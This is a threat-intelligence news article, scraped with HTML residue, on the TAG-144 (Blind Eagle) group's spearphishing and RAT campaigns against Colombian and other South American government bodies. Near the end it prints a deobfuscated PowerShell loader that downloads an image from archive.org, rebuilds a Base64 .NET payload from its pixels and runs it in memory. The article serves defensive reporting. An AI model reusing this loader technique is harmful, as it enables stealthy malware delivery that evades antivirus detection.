Over the past year, a shadowy threat actor known as TAG-144\u2014also tracked under aliases Blind Eagle and APT-C-36\u2014has intensified operations against South American government institutions.<\/p>\n
First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.<\/p>\n
In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.<\/p>\n
Initial access typically leverages compromised or spoofed email<\/a> accounts from local government agencies, luring users into opening malicious documents or SVG attachments.<\/p>\n These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord\u2019s CDN.<\/p>\n Recorded Future researchers identified<\/a> numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary\u2019s ability to blend social engineering with technical subterfuge.<\/p>\n The impact of TAG-144\u2019s campaigns<\/a> has been most severe in Colombia\u2019s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.<\/p>\n Despite sharing core tactics across clusters\u2014dynamic DNS domains, open-source RATs, and stolen crypters\u2014the group\u2019s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.<\/p>\n Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.<\/p>\n One of TAG-144\u2019s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.<\/p>\n Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus<\/a> detection.<\/p>\n For example, the deobfuscated PowerShell segment responsible for this process appears as:<\/p>\n This in-memory injection, coupled with dynamic domain resolution\u2014often leveraging services like duckdns.org and noip.com\u2014ensures that the RAT\u2019s command-and-control infrastructure remains agile and difficult to trace.<\/p>\n By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent<\/a> threat to government networks across the region.<\/p>\n The post TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgDhvuP6T5yL6d0dHWbJjw3l0a292T6POtI8TQX5uTmJnvKwYbTrXaYDShcxePKpajokmuxiXJw67usOO2NwGGmp2AStvQNMpdemJGoZm2VUPIkBepIpJD_L24ajz3EDzD3p0ki432i2qvBOiZIaWwgFXdoJP2LqY1-6gmp1h8bm20wc3LLT3xQY25Wujs\/s16000\/Phishing%2520pages%2520linked%2520to%2520Cluster%25204%2520%28Source%2520-%2520Recordedfuture%29.webp?ssl=1\")
Infection Mechanism and Steganographic Payload Extraction<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi09D7jDVjvAPKI5IlM8IO0n9orwgaLATXjRmwH3CMoi4eAbDzrx69d9-7tZJpSf8yfU9d6ZaM7aBbqhwWo1_Ar15RQeMGaGP7p4t07CvN4na45ePKGmLhwoTuPpGVS6dOxrgYjeMS67jhFPrHRB0es1vvL8GOCpkzYLqAgSQwSQ6crKK9oK9JWgbt_DRc\/s16000\/Payload%2520hosted%2520on%2520archive%255B.%255Dorg%2520URL%2520%28Source%2520-%2520Recordedfuture%29.webp?ssl=1\")
$tormodont = 'https:\/\/archive.org\/download\/universe-...\/universe.jpg'\n$sclere = New-Object System.Net.WebClient\n$sclere.Headers.Add('User-Agent','Mozilla\/5.0')\n$sorority = $sclere.DownloadData($tormodont)\n# Identify marker and extract embedded bytes\n$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]\n$stream = New-Object IO.MemoryStream\n$stream.Write($splenoncus, 0, $splenoncus.Length)\n$bitmap = [Drawing.Bitmap]::FromStream($stream)\n# Reconstruct payload from pixel data\nforeach ($y in 0..($bitmap.Height-1)) {\n foreach ($x in 0..($bitmap.Width-1)) {\n $color = $bitmap.GetPixel($x,$y)\n $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)\n }\n}\n$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')\n[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)<\/code><\/pre>\nBoost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n